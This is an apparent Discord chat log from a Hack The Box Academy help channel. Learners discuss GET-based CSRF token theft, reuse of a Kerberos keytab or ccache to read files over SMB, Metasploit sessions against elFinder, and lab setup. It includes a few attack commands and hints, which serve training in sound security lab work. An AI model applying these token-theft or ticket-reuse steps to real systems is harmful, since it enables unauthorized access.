Which if you extrapolate that it's possible in general with ssl --> it's possible in the hypothetical

@fathom pendant can you tell me the whole attack snario of the section put side the question only tell me the what they want to convey by writing csrf in get based

Ugh

It's literally the same attack, but with https/ssl instead of http

That's it

so who you would get csrf token in real world ??? to replicate the same process that they write

sighs

You would visit the website and log in to your account/a test account. Visit a self hosted page or something like that while intercepting the request to see if, in-fact there's no randomized tokens or any anti-csrf measures in place

If not then boom you launch a social engineering attack to get a logged in user to visit your malicious page and get their token

By viewing the types of requests at play, i.e. get, you can then craft malicious payloads that would then perform actions on behalf of the user, such as changing their password

Ssl only just acts to tell the browser it's using https

That's it

@fathom pendant but in that case there is csrf token

Then you can't do it, if it's a randomized token. But again that wasn't the question as originally posed

:p if any anti-csrf measures are in place then it makes it virtually impossible

Also there's a section

remediation advice which goes over prevention methods

so see all the question above i am talking you who to get csrf token . so in which context they write the section get based csrf if we could not mount it in real life

I don't think I quite understand your question

It's likely the module uses a cookie labeled csrf that isn't actually randomized

Just to reinforce the idea

Generally a session cookie might look like site_session={cookie}

i learn through portswigger and ranakhlil video but the context they write on get based csrf are unable to understand like mixing things

I think there's also a language barrier that's further creating a misunderstanding

If you link your app.hackthebox.com account by following #welcome you can ask in #web and someone there can likely better explain it

But in general a malicious html will write any gathered session cookies it grabs to a file so it doesn't have to be intercepted

Or is logged in some way for the attacker to view it

The modules will explain to you so that you understand how it works in an ideal for the hacker situation. Of course there are many factors involved but you will get basic understanding. SSL will make it harder to snoop in on traffic but not entirely impossible

Ssl doesn't matter if the request is being made directly to the malicious page

Since the data won't be encrypted when it arrives

So sniffing is not even a factor

Also none of the sections about it talk about sniffing, they talk about intercepting with burpsuite

True

so after all the things who would an attacker mount the attack if he not have csrf token of victim that they show .

That was my language barrier 😅

They get the victim to send them their token

Also it's *how not *who

That's what the example and setup is showing

The attacker in some way receiving the victim's session token

Usually it's via social engineering

I.e. an email

This is why most organizations at minimum don't show images from outside sources

👍

Or at the very least use some form of screening to prevent it

Intercepting is not the same as sniffing

ohhh wait... is HTB academy different than HTB?

Sniffing is passively listening on the network

Yes

Academy is the learning site

do you have to pay for HTB?

Main site? No

idk bro im legit brand new to everything i started the modules two days ago

All active content is free

@fathom pendant no so why they write at top Cross-Site Request Forgery (GET-based)
Similar to how we can extract session cookies from applications that do not utilize SSL encryption, we can do the same regarding CSRF tokens included in unencrypted requests.

idk what you mean?

On main site there's active and retired content

Retired requires vip sub to access

Well the normal HTB site is for season and active machines/fortresses, you can look at it like small "pentest". Academy is there to teach you

and in middle ;>>>>> they write :Notice that the CSRF token's value above is the same as the CSRF token's value in the captured/"sniffed" request.dle

Because it's using http as a simple example

ok ok so help me out here... i started everything brand new two days ago and i want to join the army for cybersecurity... what would be the best starting point?

As previous examples were also using http

Not joining the army /hj

Academy best for learning
The main site you can see as practice etc

relax lil bro its what i wanna do so im not in college debt forever

Lmao "Lil bro"

Anyway, academy and it's paths are good for learning I'd also look into DoD specs for cybersec and see the certs they have

Because DoD compliant certs are gonna be what you're going after anyway in the military

@thanks for help but i thing you need to go through the module section

I am

And I'm telling you

They are using http to remain consistent with previous sections, that's it

The same steps can apply even with https as long as there's no other protections in place

SSL just means there's a security cert via some Certificate Authority

It does not mean that it's completely safe

Which is a common misconception

They are using previously established examples that way you don't have to try and think of anything else

Otherwise: the technique is the same

Since nothing about the site had changed aside from adding ssl

however in the get based csrf they used the same way in that they use in general csrf except copy pasting csrf token and mounting the attack

We keep circling around the point

Point is: it works, the end

If you genuinely want to learn more do research on your own

first talk to a recruiter

Instead of relying on others to partially explain it to you

They never lie

It's illegal for them to lie

they never do but if they're going into the army for cybersec might as well ask

Yep

already did hes a family friend who has a PhD in cybersecurity and speaks 7 languages

And understand asvab scoring

alr took the asvab 🙄

Doesn't mean you understand it

and what did he tell you

yes yes it does he showed me my scores

im not a child mate

Don't know since azure is a subscription

🙂

afaik no cloud content planned but there is an enterprise pro lab for azure ad

Azure is a subscription based thing, so unsure how it would work in the academy environment

no cloud content then :(

Also if you link your account following #welcome @stable bone there's the #careers-and-certs channel which is more apt to ask in

i tried that already but it says i dont exist?

you need an account on the main platform

Because app.hackthebox.com and academy.hackthebox.com are separate accounts technically

Only linked by sso once you sign up

Im stuck on this last question too.. have you succeeded? Spent +4h and giving up for some help. Ive ran kinit for LINUX01$ with the keytab found on /etc and exported the ccache under /var/lib but no luck. Any help is appreciated

The linux01$ ticket isn't in tmp

Using an enumeration tool discussed at the end of the section can help you find the ticket

Correct, I used the linikatz

One in /var/lib... should work

Make sure its not expired

But to kinit with the one found on var lib doesn't work either

Did you kinit with the username?

Yes, LINUX01$

kinit 'linux01$@inlanefreight.htb'

Linux01$ is only the partial name

As noticed with the initial user vector the full username included the domain

david@inlanefreight.htb

Hmm interesting, will try this after a break..

The key tab in etc will work for this

Note* this is how the official writeup did it, I exported the ccache file as my KRB5CCNAME and got it that way

Don't forget with smb stuff using keytab/kerberos auth you need the -k flag

Should I kinit before or after export?

And -N ofc so it doesn't prompt a pw

You don't need to export with kinit

I didn't do kinit and got it with exporting just fine

With smb I was using -k -no-pass too

I'm just going by what i see and what I did ¯_(ツ)_/¯

Like I said though the kinit likely failed bc you didn't use the full username

Just the partial

Maybe failed silently because I got no err msgs

It'll do that

Sneaky bastard

I'm just curios as to what are the reasons for launching msfconsole as root

First immediate thought is that some ports may be opened that require root

or some exploits too

copied /var/lib/sss/db/ ccache file to /root
export KRB5CCNAME=/root/ ccache file
klist, everything looks valid and correct principal LINUX01$
smbclient //dc01/linux01 -k -N -c “get /flag.txt /root/flag2.txt”

got err: gensec_spnego_client_negTokenInit_step: gse_krb5: creating NEG_TOKEN_INIT for cifs/dc01 failed (next[(null)]): NT_STATUS_NO_LOGON_SERVERS
session setup failed: NT_STATUS_NO_LOGON_SERVERS

Yeah I understand the ports part but I've always ran it as non root and never had issues with that

no logon servers

That's odd

the us servers seems to be broken for this module, there was someone earlier who switched to eu2 and it worked

cool, I will try

Weird

Introduction to Web Applications->HTML Injection->'What text would be displayed on the page if we use the following payload as our input: <a href="http://www.hackthebox.com">Click Me</a>' And hint->'Use the full text displayed on the page as the answer "Your ..."'
so i am confused because as i understood this very old module with question. But site changed content. I remember on site something like that: "Your journey start here.' But i can't find right sentence can you give me answer because i am sure i won't pass that question.

OMG, thank you so much! that was the issue.. bogus VM on US servers. Just finished this LONG LONG LONG module. Also thanks @fathom pendant for sanity check!!!

send a message to support so that they can fix it

sure, their support team it's offline but a ticket has been opened

Hey, can you help me please. I also have the decoded output but I think my formatting is wrong. I tried putting the "serial=code", serial=code, code, etc. but nothings seems to be working.

I take it you decoded the output and put that in as the serial yeah?

But the format would be -d "serial={decoded_output}" (without brackets

As you're sending a post request with data

I decoded the flag and then in the answer i'm typing serial=decoded_code

Yes I'm just asking that you're replacing the decoded_code portion with your output that's all

:)

yes

Ok

It might help to add ;echo after the curl request so you get a new line output

As the response tends to bleed into your line

So you may overlook it

bro guys im so lost how do i get a local version of pwnbox or linux... isnt it literally the same thing as Ubuntu?

Pwnbox is parrot

You can download from https://parrotsec.org

isn't the pwnbox a bit customized though?

Yes but it's based on parrot

it keeps telling me to install Linux or pwnbox or wtv but i literally have Ubuntu through the Oracle virtual machine its not the same thing?

Not the same thing. They're all Linux distributions, but they are different. You can do everything you can with a ParrotOS and Kali on Ubuntu, but you'll need to know how to install all the apps (kali and parrot have tons of them already preinstalled). You'll have to do extra leg work to get certain apps working on Ubuntu. Easier to just use kali or the parrot os.

thank you i feel so dumb im brand new to everything 😭

Don't feel that way, everyone had to start somewhere. Everyone learned this from someone at one point.

how do i make a session?

A session is when you connect to a victim

tyyy marcieee bro is goated

I tried but it is the same output

but for me to use a specfic module it wants me to use a session that doesnt make sense?

Just checked, it's working for me

Well it should have had you connect to a target using some exploit

so apaprently im mean to use this exploit but it wants a session

Literally just checked it works for me

Can i ping u privately maybe my format is still wrong

This looks like a post-exploit

im so lost icl

me literally the last two days

No, the decoding should give you a l337sp34k serial to use

so how do i find what module im gonna use on an ip?

what module is this

what academy module*

using the metasploit framework

framework got me tweakin n shi cuh

Then it's as simple as curl -d "serial=<decoded_output>" http://ip:port/serial.php

Oh the whole thing

Im just typing the middle part

How are you gonna post to nothing and expect a response

What section?

'Sessions & Jobs'

get something to call back to your listener on msfconsole, then you should be able to use that post-exploitation module

Yeah you're lost homie

As the questions refer to the target as running an old version of sudo

Sudo != windows

im on this bit

i got the target sepcficifc web application of elFinder and now im on q2.

cant seem to get a shell with the target thatsw what i been stuck on

Yeah so search up exploits for elfinder

Don't know how that lead to windows

ik some guy yesterday told me to use it

i was confused cuz i nmapped and the shi was runnin on linux

Bro trust your enumeration

Step back and go to square one with it

You know the app so search that

Start there with finding your info and shell

Hello guys I’m doing (modern web explosion techniques —> second order command injection) I was able to get rce but I don’t know where is the flag path to cat it

Well if you have rce try and find it

Either using rudimentary ls/dir

i have a question... does HTB have employees to answer my dumb questions or is marcie just a goat?

They don't pay me

so youre just on here 24/7 helping ppl?

https://tenor.com/view/sad-gif-7523306793289960933

Eh a majority of time

its always mods i need help not how are the mods

hes investing in us by creating future cybersecurity experts

bro gotta put his stocks elsewhere not on me😭

what do i do here?i rdp like i shouldve
but wha

Damn

marcie go on strike bro

bro dont give him ideas without him we are finished

fr

@fathom pendant dont go on strike you didnt read that forget everything

Just went through as intended and took maybe a few minutes for everything to work :) whoever told you windows was on crack

Don't forget that -V is often most tools way of giving you the version

ye nmap -sV to get the version

Not for q3

Also the version doesn't matter for q2 there's only 2 relevant possible exploits if you search in msfconsole

this it? for q 2

it wants a target uri and i have no idea what that is

Only relevant options are rhosts and lhost

Also spoilers

Also I will always abide by the "don't ask, just do" method

Don't ask until you've tried and it didn't work

i got a session with /var/ww/html/files but what does that mean now? like where am i

ah

had to do shell command

www-data q2 complete - was stuck on it since yesterday 8pm thank u marcie

hey so every time i try to open the parrot file it says "which app you want to open it with" but its only ever some media player, what do i do?

screenshot it

it wont let me it keeps disappearing when i ss

dont screenshot from the machine screenshot out the machien

windows+shit+s

i cant even get into the machine...

ik... but it keeps disappearing...

use windows shift s

so

yes but it keeps going away when i try

add the parrot iso using vm

like dont try open the parrto file

ohhh

ok so how do i do that...

then select the iso file

cant open machine

what machien u using

oracle

right so u on this bit

yes it looks just like that

so click add at top

and select iso file

"Can't open machine"

I keep getting the same encoded text after posting "serial=<decoded_output>" 😭

u need to try screenshot and show me

how could someone read this ?

the imd64 ios file is now gone forever i cant find it

https://parrotsec.org/docs/virtualization/install-parrot-on-virtualbox/ did you try to follow this?

I got it now. Thank you

i just get this

It's covered in the intro to windows module iirc

leeme check

windows fundamentals ?

Yeah

I think it's been a minute

If not it's intro to ad

That's the DACL yeah?

Then you look up that error and continue from there

Sounds like file may be corrupted, try downloading again

https://forums.virtualbox.org/viewtopic.php?t=84877

kerberos Attack

I meant the format

I believe it's one of the acl related things

Ah it's SACL

https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/ @limber river

I just completed vulnerability assessment module

ya

i cant rdp dude

keeps giving me this error

i have issue with rdp too, conect for 1 minute and disconect for 2 min, that's prety anoying

tysm